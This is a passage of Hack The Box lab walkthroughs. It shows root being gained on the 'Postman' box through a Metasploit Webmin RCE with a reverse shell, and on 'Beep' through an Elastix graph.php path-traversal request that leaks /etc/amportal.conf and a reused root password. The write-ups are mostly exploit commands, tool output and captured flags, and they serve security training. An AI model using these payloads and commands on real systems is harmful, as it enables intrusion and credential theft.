Webmin 1.5 - Web Brute Force (CGI)                                        | exploits/multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)     | exploits/unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                                   | exploits/cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)                      | exploits/cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)    | exploits/linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                                      | exploits/linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)         | exploits/linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution                                 | exploits/cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)        | exploits/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)       | exploits/multiple/remote/2017.pl
phpMyWebmin 1.0 - 'target' Remote File Inclusion                          | exploits/php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion                      | exploits/php/webapps/2451.txt
webmin 0.91 - Directory Traversal                                         | exploits/cgi/remote/21183.txt
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

For the Webmin 1.9.10, we have one vulnerability “Webmin 1.910 - ‘Package Updates’ Remote Command Execution”.
By using the previous username and password, we can get a root shell.
Also, with the common python method, we can achieve an interactive full shell.

msf5 > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.9:4444 
[+] Session cookie: 28319cb492d25d1493cbd8a83f732ca8
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.160:49658) at 2020-03-16 18:56:54 +0200
id

uid=0(root) gid=0(root) groups=0(root)
python -c "import pty;pty.spawn('/bin/bash')"
root@Postman:/usr/share/webmin/package-updates/# 

As always, root.txt is in the directory “/root”.

root@Postman:~# pwd
pwd
/root

root@Postman:~# cat root.txt
cat root.txt
a257741c5bed8be7778c6ed95686ddce
root@Postman:~# 

Hackthebox Beep Walkthrough

placeholder

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Beep”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.7 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 09:55 EET
Nmap scan report for 10.10.10.7
Host is up (0.044s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL STLS EXPIRE(NEVER) APOP TOP IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING RESP-CODES USER LOGIN-DELAY(0)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ATOMIC LITERAL+ CATENATE ANNOTATEMORE OK CHILDREN IDLE X-NETSCAPE MULTIAPPEND UIDPLUS ID MAILBOX-REFERRALS IMAP4rev1 NAMESPACE LIST-SUBSCRIBED LISTEXT URLAUTHA0001 CONDSTORE UNSELECT Completed SORT=MODSEQ THREAD=ORDEREDSUBJECT THREAD=REFERENCES BINARY SORT RIGHTS=kxte NO STARTTLS RENAME QUOTA IMAP4 ACL
443/tcp   open  ssl/https?
|_ssl-date: 2020-03-01T09:01:11+00:00; +1h02m01s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1h02m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 382.63 seconds

root@kali:~#

Gobuster HTTP:

root@kali:~# gobuster dir -u http://10.10.10.7/ -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.7/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/03/01 10:04:30 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.7/23b3f8d9-6290-4f1e-85a5-9a8041a56e20 => 302. To force processing of Wildcard responses, specify the '--wildcard' switch

root@kali:~# 

Gobuster HTTPS:

root@kali:~# gobuster dir -u https://10.10.10.7/ -k -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/03/01 10:12:31 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/admin (Status: 301)
/cgi-bin/ (Status: 403)
/config.php (Status: 200)
/configs (Status: 301)
/favicon.ico (Status: 200)
/help (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/lang (Status: 301)
/libs (Status: 301)
/mail (Status: 301)
/modules (Status: 301)
/panel (Status: 301)
/register.php (Status: 200)
/robots.txt (Status: 200)
/static (Status: 301)
/themes (Status: 301)
/var (Status: 301)
===============================================================
2020/03/01 10:15:22 Finished
===============================================================

root@kali:~# 

2. Getting Root

On port 443, we can find a login console of Elastix. placeholder

We can find a vulnerability for the Elastix by searchsploit.

root@kali:~# searchsploit elastix
----------------------------------------------------------- ----------------------------------------
 Exploit Title                                             |  Path
                                                           | (/usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting                      | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities    | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilit | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion           | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                          | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                         | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution     | exploits/php/webapps/18650.py
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

This time, we can take advantage of the vulnerability “Elastix 2.2.0 - ‘graph.php’ Local File Inclusion”. placeholder

According to this page, by accessing the following HTTP request, we can exploit the LFI of Elastix.

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

placeholder

If we grep the word “password”, we can find an interesting parameter. placeholder

Now we got the following password.

jEhdIekWmdjE

This time, we can use this password for connecting to SSH.
As always, we have “root.txt” in the directory “/root”.

root@kali:~# ssh root@10.10.10.7
root@10.10.10.7's password: 
Last login: Sun Mar  1 19:45:39 2020 from 10.10.14.27

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# cat /root/root.txt 
d88e006123842106982acce0aaf453f0

[root@beep ~]#